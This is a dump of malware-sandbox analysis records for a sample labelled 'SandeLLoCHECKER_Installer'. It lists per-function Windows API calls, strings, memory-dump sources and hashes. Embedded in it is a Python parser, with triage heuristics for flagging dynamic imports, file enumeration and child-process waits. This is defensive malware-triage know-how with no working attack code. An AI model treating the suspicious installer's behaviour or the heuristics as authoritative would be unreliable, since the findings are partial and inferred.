• Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
• String ID:
• API String ID: 1102183713-0
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0087E83D
• std::_Lockit::_Lockit.LIBCPMT ref: 0087E85F
• std::_Lockit::~_Lockit.LIBCPMT ref: 0087E887
• __Getcoll.LIBCPMT ref: 0087E951
• std::_Facet_Register.LIBCPMT ref: 0087E996
• std::_Lockit::~_Lockit.LIBCPMT ref: 0087E9CE
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
• String ID:
• API String ID: 1184649410-0
APIs
• GetLastError.KERNEL32(?,?,00A17A0A,00A179D6,?,?,0087BBBD,0095F350,?,00000008), ref: 00A17A21
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A17A2F
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A17A48
• SetLastError.KERNEL32(00000000,00A17A0A,00A179D6,?,?,0087BBBD,0095F350,?,00000008), ref: 00A17A9A
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• _wcsrchr.LIBVCRUNTIME ref: 009A5504
  • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
  • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
  • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
• DeleteFileW.KERNEL32(?), ref: 009A55AA
• _wcsrchr.LIBVCRUNTIME ref: 009A5619
• DeleteFileW.KERNEL32(?,?,?), ref: 009A56DF
  • Part of subcall function 00964070: LoadStringW.USER32(000000A1,?,00000514,C7BA013E), ref: 00963FD6
Strings
• --verbose --log-file="%s" --remove-pack-file "%s" "%s", xrefs: 009A555E
Similarity
• API ID: DeleteFileInit_thread_footer_wcsrchr$HeapLoadProcessString
• String ID: --verbose --log-file="%s" --remove-pack-file "%s" "%s"
• API String ID: 2702461799-3685554107
APIs
• __Init_thread_footer.LIBCMT ref: 008497D5
• __Init_thread_footer.LIBCMT ref: 00849820
Strings
Similarity
• API ID: Init_thread_footer
• String ID: </a>$<a href="$<a>
• API String ID: 1385522511-4210067781
APIs
• CreateWindowExW.USER32(?,SysTabControl32,?,46010000,?,?,?,?,00000000,00000309,00000000), ref: 008771BD
• SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 008771D2
• SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 008771DA
  • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
  • Part of subcall function 00878E00: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00878E4C
Strings
Similarity
• API ID: MessageSend$AllocateCreateHeapWindow
• String ID: SysTabControl32$TabHost
• API String ID: 2359350451-2872506973
APIs
• InitializeCriticalSection.KERNEL32(C7BA013E,C7BA013E,?), ref: 00863E1F
• EnterCriticalSection.KERNEL32(?,C7BA013E,?), ref: 00863E2C
• KillTimer.USER32(?,00000001), ref: 00863E74
• LeaveCriticalSection.KERNEL32(?,?,00000000,?), ref: 00863F03
Strings
Similarity
• API ID: CriticalSection$EnterInitializeKillLeaveTimer
• String ID: v
• API String ID: 3614119372-3261393531
APIs
• GetModuleHandleW.KERNEL32(Advapi32.dll,C7BA013E,00000000,?,?,?,00000000,Function_001FE310,000000FF), ref: 0094B703
• GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 0094B72C
• RegCloseKey.ADVAPI32(00000000,?,?,?,00000000,Function_001FE310,000000FF), ref: 0094B78C
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
Similarity
• API ID: AddressCloseHandleModuleProc
• String ID: Advapi32.dll$RegCreateKeyTransactedW
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,C7BA013E,?,?,00000000,00A9D7B9,000000FF,?,00A2153C,?,?,00A21510,?), ref: 00A215E1
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A215F3
• FreeLibrary.KERNEL32(00000000,?,?,00000000,00A9D7B9,000000FF,?,00A2153C,?,?,00A21510,?), ref: 00A21615
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
APIs
• SleepConditionVariableCS.KERNELBASE(?,00A162C7,00000064), ref: 00A1634D
• LeaveCriticalSection.KERNEL32(00B2FE4C,?,?,00A162C7,00000064,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF), ref: 00A16357
• WaitForSingleObjectEx.KERNEL32(?,00000000,?,00A162C7,00000064,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF), ref: 00A16368
• EnterCriticalSection.KERNEL32(00B2FE4C,?,00A162C7,00000064,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF,?,00985F11), ref: 00A1636F
Similarity
• API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
• String ID: v
APIs
Similarity
• API ID: Delete$ClientObjectRect
• String ID:
APIs
Similarity
• API ID: ItemMessageSendWindow
• String ID:
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 009599D4
• std::_Lockit::_Lockit.LIBCPMT ref: 009599F6
• std::_Lockit::~_Lockit.LIBCPMT ref: 00959A1E
• std::_Facet_Register.LIBCPMT ref: 00959B07
• std::_Lockit::~_Lockit.LIBCPMT ref: 00959B31
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
• String ID:
APIs
• SetFocus.USER32(00000000,?,?), ref: 0086FB88
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0086FBD0
• SendMessageW.USER32(?,0000102C,000000FF,0000F000), ref: 0086FBEC
• SendMessageW.USER32(?,0000102B,000000FF,?), ref: 0086FC1E
• SetFocus.USER32(00000000,?,?), ref: 0086FC31
Similarity
• API ID: MessageSend$Focus
• String ID:
APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: Local$Free$ErrorLast$Alloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3879364810-0
                                                                                                                        • Opcode ID: b2d129c31e72d896ac12c4ab3cfda15b3326412644776ae2e5be784d3c45cb7f
                                                                                                                        • Instruction ID: edcc4d93dc4b085082094f3846301fa111777a2fbdad7bdeaae2b49c0a3c28fb
                                                                                                                        • Opcode Fuzzy Hash: b2d129c31e72d896ac12c4ab3cfda15b3326412644776ae2e5be784d3c45cb7f
                                                                                                                        • Instruction Fuzzy Hash: BB3106B16007019FDB20DF7AD845B67B7E8FF44711F00493EEA46C2650EB74E8099BA1
APIs
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00850A2A
• HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00850A30
• FormatMessageW.KERNEL32(00001300,00000000,?,00000400,00000000,00000000,00000000), ref: 00850A53
• GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00A3FCB6,000000FF), ref: 00850A7B
• HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,00A3FCB6,000000FF), ref: 00850A81
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
Similarity
• API ID: Heap$FreeProcess$FormatMessage
• String ID:
• API String ID: 1606019998-0
• Opcode ID: cd2f104302b26f7f99d62fc5131575797958f32021316525ee5aac38d01bf49e
• Instruction ID: 872372b74a2685f44b138c7ac8bd4e5f4ed901935d1e022be1aa48c15b36ef69
• Opcode Fuzzy Hash: cd2f104302b26f7f99d62fc5131575797958f32021316525ee5aac38d01bf49e
• Instruction Fuzzy Hash: 7F1130B1E44359ABEB10DFA4DD06FAFBBB8FB04B04F100519F910A72C1D7B59A048B95
APIs
• GetWindowLongW.USER32(?,000000F0), ref: 0086833B
• SendMessageW.USER32(?,?,?,0000102B), ref: 00868398
• SendMessageW.USER32(?,?,?,0000102B), ref: 008683E7
• SendMessageW.USER32(?,00001043,00000000,00000000), ref: 008683F8
• SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00868405
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
• Opcode ID: a320d8d153917dfa1c057eb2ad865a0c00f141d7eeefb2f60d3b862b2d527b67
• Instruction ID: 9d039856403381c65c20fe2e4bbce305834ece23066e89ea4d5bdf392f976da8
• Opcode Fuzzy Hash: a320d8d153917dfa1c057eb2ad865a0c00f141d7eeefb2f60d3b862b2d527b67
• Instruction Fuzzy Hash: 99215131918346AAD220DF11CD44B1ABBF5FFED758F206B1EF1D4211A4EBF191848E86
APIs
• WaitForSingleObject.KERNEL32(?), ref: 0084D3F1
• GetExitCodeProcess.KERNEL32(?,?), ref: 0084D40E
• GetLastError.KERNEL32 ref: 0084D418
• GetLastError.KERNEL32 ref: 0084D42F
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
Similarity
• API ID: ErrorLast$CodeExitObjectProcessSingleWait
• String ID:
• API String ID: 590199018-0
• Opcode ID: f9eed7e7523aa98b0e7b58d1230a7e6a07d8fa0482c9546c99d10508d1f79640
• Instruction ID: fbbb32cd29f7f179a038ad12234dac9a033eaa88685307fccf46ba58d15f014b
• Opcode Fuzzy Hash: f9eed7e7523aa98b0e7b58d1230a7e6a07d8fa0482c9546c99d10508d1f79640
• Instruction Fuzzy Hash: 14014032A00609CFDB109FACDC04669BBB9FF44371B144766D825E32A1FB35AC628A94
APIs
• CreateWindowExW.USER32(?,RichEdit20W,?,?,?,?,?,?,00000000,00000000,00000000), ref: 008744FC
• SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00874511
• SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00874519
  • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
Strings
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
Similarity
• API ID: MessageSend$AllocateCreateHeapWindow
• String ID: RichEdit20W
• API String ID: 2359350451-4173859555
• Opcode ID: 309f6e47b8e2adbcc570dc86fbddd27983e38097d0a083f8244b5aa222ea8d2f
• Instruction ID: 3eec3df16096949ea32a98e2c4ec90834109893de2cf5e9457fb2cdf2ae74f84
• Opcode Fuzzy Hash: 309f6e47b8e2adbcc570dc86fbddd27983e38097d0a083f8244b5aa222ea8d2f
• Instruction Fuzzy Hash: A9B18C71A012099FDB15CFA8C994BEEBBF4FF48710F144269E819EB291DB71AD00CB64
APIs
  • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
  • Part of subcall function 0093EE40: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,000000EF,?,00867908,00000000,80004005), ref: 0093EEA8
  • Part of subcall function 0093EE40: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0093EED8
• SendMessageW.USER32(?,00001036,00000004,00000004), ref: 0086EAED
• SendMessageW.USER32(?,00001036,00000400,00000400), ref: 0086EB04
• SendMessageW.USER32(?,00001061,00000000,?), ref: 0086EB60
Strings
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
Similarity
• API ID: MessageSend$AllocateHeapWindow
• String ID: QuickSelectionList
• API String ID: 3168177373-3633591268
• Opcode ID: a4690c3a8fe4627ba3fe041a1955da233edf02189fef8d583178e795d5489328
• Instruction ID: 0c5a7ca973e4504737239394bef55745d1a0f73130c48d3640b3c11ea69ebc2f
• Opcode Fuzzy Hash: a4690c3a8fe4627ba3fe041a1955da233edf02189fef8d583178e795d5489328
• Instruction Fuzzy Hash: D881BD75A00209AFDB14DF68C884BAAF7F5FF88314F104659E515AB290DB74AD04CFA1
APIs
• WaitForSingleObject.KERNEL32(?,000000FF,C7BA013E), ref: 009A4AC4
  • Part of subcall function 00949600: MultiByteToWideChar.KERNEL32(00000003,00000000,00986984,000000FF,00000000,00000000,00000000,00AAC2BE,?,00986984,00AAC2BE), ref: 00949618
  • Part of subcall function 00949600: MultiByteToWideChar.KERNEL32(00000003,00000000,00986984,000000FF,?,-00000001,?,00986984,00AAC2BE), ref: 0094964A
  • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
Strings
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapObjectSingleWait
• String ID: *.*$.jar$.pack
• API String ID: 2019434529-3892993289
• Opcode ID: 2fe0e6b6364a4e2402cd435ade918d8482a37c63074fa621dc78a206075382ae
• Instruction ID: 64a2eb1f0aa6afb7f230763ea0ec89557f2af53f5ffc4b61cc0f3c699011aa44
• Opcode Fuzzy Hash: 2fe0e6b6364a4e2402cd435ade918d8482a37c63074fa621dc78a206075382ae
• Instruction Fuzzy Hash: 19518170A0161A9FDB10DFA9C848BAEB7B8FF45324F104269E425EB291DB74D900CBE1
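The records above are the raw form of the sandbox's per-function view: an "APIs" list (direct calls plus "Part of subcall function" lines for callee calls, each with a ref: address), a memory-dump source, and a "Similarity" block whose API ID and String ID are "$"-joined. Reading two hundred of them by eye is slow, so here is an added example (my own code, not part of Joe Sandbox or of this report) that parses records in this format into dicts and applies a few triage heuristics. The SAMPLE_RECORDS text is constructed to mirror three of the records above (with the "Associated" dump lines left out), and the three rules it applies, run-time import resolution, wildcard file enumeration, and a synchronous wait on a child process, are my own assumptions about what deserves a second look, not something the report asserts.

```python
"""Parser for Joe Sandbox function records (the 'APIs' / 'Similarity' blocks in
this report) plus a few triage rules. Added example, not code from Joe Sandbox
or from this report: SAMPLE_RECORDS is constructed to mirror three records
above, and the triage rules are the author's own heuristics (assumptions)."""
import re
from collections import Counter

# One API line. "Part of subcall function XXXX:" marks a call made by a callee,
# and args are optional ("GetLastError.KERNEL32 ref: 0084D418" has none).
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?(?P<name>\w+)\."
    r"(?P<module>[A-Z0-9]+)(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
# Key/value lines from the "Similarity" and "Memory Dump Source" blocks.
KV_LINE = re.compile(r"^(?P<key>API ID|String ID|API String ID|Opcode ID|"
                     r"Instruction ID|Source File):\s*(?P<val>.*)$")

# Constructed sample in the report's record format (bullets and indentation as
# rendered; "Associated" dump lines omitted).
SAMPLE_RECORDS = """\
APIs
• WaitForSingleObject.KERNEL32(?), ref: 0084D3F1
• GetExitCodeProcess.KERNEL32(?,?), ref: 0084D40E
• GetLastError.KERNEL32 ref: 0084D418
• GetLastError.KERNEL32 ref: 0084D42F
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
Similarity
• API ID: ErrorLast$CodeExitObjectProcessSingleWait
• String ID:
• API String ID: 590199018-0
• Opcode ID: f9eed7e7523aa98b0e7b58d1230a7e6a07d8fa0482c9546c99d10508d1f79640
APIs
• WaitForSingleObject.KERNEL32(?,000000FF,C7BA013E), ref: 009A4AC4
  • Part of subcall function 00949600: MultiByteToWideChar.KERNEL32(00000003,00000000,00986984,000000FF,00000000,00000000,00000000,00AAC2BE,?,00986984,00AAC2BE), ref: 00949618
  • Part of subcall function 00949600: MultiByteToWideChar.KERNEL32(00000003,00000000,00986984,000000FF,?,-00000001,?,00986984,00AAC2BE), ref: 0094964A
  • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
Strings
Similarity
• API ID: ByteCharMultiWide$AllocateHeapObjectSingleWait
• String ID: *.*$.jar$.pack
• API String ID: 2019434529-3892993289
• Opcode ID: 2fe0e6b6364a4e2402cd435ade918d8482a37c63074fa621dc78a206075382ae
APIs
• LoadLibraryW.KERNEL32(combase.dll,RoOriginateLanguageException), ref: 00850DF2
• GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00850DF8
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RoOriginateLanguageException$combase.dll
• API String ID: 2574300362-3996158991
• Opcode ID: 7d82d2e204f06bc42400d9e9955639f6a99659f3c73af798c6cecfe103721c13
"""


def parse_records(text):
    """Split the text at each 'APIs' header and return one dict per function."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()  # drop indentation and bullets
        if line == "APIs":
            cur = {"apis": [], "subcall_apis": [], "strings": []}
            records.append(cur)
            continue
        if cur is None or not line:
            continue
        m = API_LINE.match(line)
        if m:
            call = {"name": m["name"], "module": m["module"], "ref": m["ref"],
                    "args": m["args"].split(",") if m["args"] else []}
            (cur["subcall_apis"] if m["sub"] else cur["apis"]).append(call)
            continue
        m = KV_LINE.match(line)
        if m and m["key"] == "String ID":
            cur["strings"] = [s for s in m["val"].split("$") if s]  # '$'-joined
        elif m:
            cur[m["key"].lower().replace(" ", "_")] = m["val"]
    return records


def triage(rec):
    """Return (tag, detail) findings for one record. Only direct calls count, so
    a LoadLibrary deep inside a callee does not tag every caller."""
    names = {c["name"] for c in rec["apis"]}
    findings = []
    if names & {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"} \
            and "GetProcAddress" in names:
        # Export resolved by name at run time; low signal for one documented export.
        findings.append(("dynamic-import", "$".join(rec["strings"])))
    if any(s.startswith("*.") for s in rec["strings"]):
        # Wildcard plus suffix strings usually mean directory enumeration.
        findings.append(("file-enumeration", "$".join(rec["strings"])))
    if {"WaitForSingleObject", "GetExitCodeProcess"} <= names:
        # Wait on a handle then read its exit code: a synchronous child process.
        findings.append(("child-process-wait", rec.get("api_id", "")))
    return findings


def api_histogram(records):
    """How often each API is called directly across all parsed records."""
    return Counter(c["name"] for r in records for c in r["apis"])


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for r in recs:
        print(r.get("opcode_id", "?")[:8], r.get("api_id"), triage(r))
    print(api_histogram(recs).most_common(5))
```

On the sample this tags the LoadLibraryW/GetProcAddress record as a dynamic import, the *.*/.jar/.pack record as file enumeration and the WaitForSingleObject/GetExitCodeProcess record as a child-process wait. The first of those is deliberately weak: resolving one documented export of a system DLL by name is routine, and what matters is which export and whether the names are literals or built from data. The file-enumeration record is the one to chase, and the per-call ref: addresses the parser keeps (009A4AC4 for the wait, 00949618 for the string conversion) are where to start in the memory dump.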
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(combase.dll,RoOriginateLanguageException), ref: 00850DF2
                                                                                                                        • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00850DF8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: RoOriginateLanguageException$combase.dll
                                                                                                                        • API String ID: 2574300362-3996158991
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(00B3683C), ref: 0085959C
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 008595B0
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B3683C), ref: 008595EF
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                                                        • String ID: v
                                                                                                                        • API String ID: 2351996187-3261393531
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00A1AAED,?,?,00000000,?,?,?,00A1AC17,00000002,FlsGetValue,00AA0F08,FlsGetValue), ref: 00A1AB49
                                                                                                                        • GetLastError.KERNEL32(?,00A1AAED,?,?,00000000,?,?,?,00A1AC17,00000002,FlsGetValue,00AA0F08,FlsGetValue,?,?,00A17A34), ref: 00A1AB53
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00A1AB7B
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                        • String ID: api-ms-
                                                                                                                        • API String ID: 3177248105-2084034818
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 008678B8
                                                                                                                        • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 008678CD
                                                                                                                          • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
                                                                                                                          • Part of subcall function 0093EE40: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,000000EF,?,00867908,00000000,80004005), ref: 0093EEA8
                                                                                                                          • Part of subcall function 0093EE40: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0093EED8
                                                                                                                        • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00867A03
                                                                                                                        • SendMessageW.USER32(?,00001061,00000000,00000005), ref: 00867AFF
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$AllocateHeapWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3168177373-0
                                                                                                                        APIs
                                                                                                                        • SysAllocStringLen.OLEAUT32(00000000,?), ref: 00855CDA
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00855D26
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00855D48
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00855EA3
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Free$Alloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 986138563-0
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(?), ref: 0085C55C
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0085C56B
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDevice
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 328075279-0
                                                                                                                        APIs
                                                                                                                        • GetWindowDC.USER32(?,C7BA013E,?,00000000,?,?,?,?,?,00000000,00A44635,000000FF,?,00868802,?,?), ref: 00868A82
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00868AA1
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00868B61
                                                                                                                        • DeleteDC.GDI32(?), ref: 00868B84
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteWindow$ObjectRect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1993412026-0
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,000000C5,?,00000000), ref: 0087461B
                                                                                                                        • GetClientRect.USER32(?,?), ref: 0087464D
                                                                                                                        • GetDC.USER32(?), ref: 00874660
                                                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00874667
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsClientDeviceMessageRectSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3507044913-0
                                                                                                                        • Opcode ID: 14fe230e53607c248bcf051013eb99a94b840b2c276c645ccf75a80fd1d81d39
                                                                                                                        • Instruction ID: 7b2a4caf838b5825834620ad64b722b89c0bc8556b0f5da594b4ac8f0c346d04
                                                                                                                        • Opcode Fuzzy Hash: 14fe230e53607c248bcf051013eb99a94b840b2c276c645ccf75a80fd1d81d39
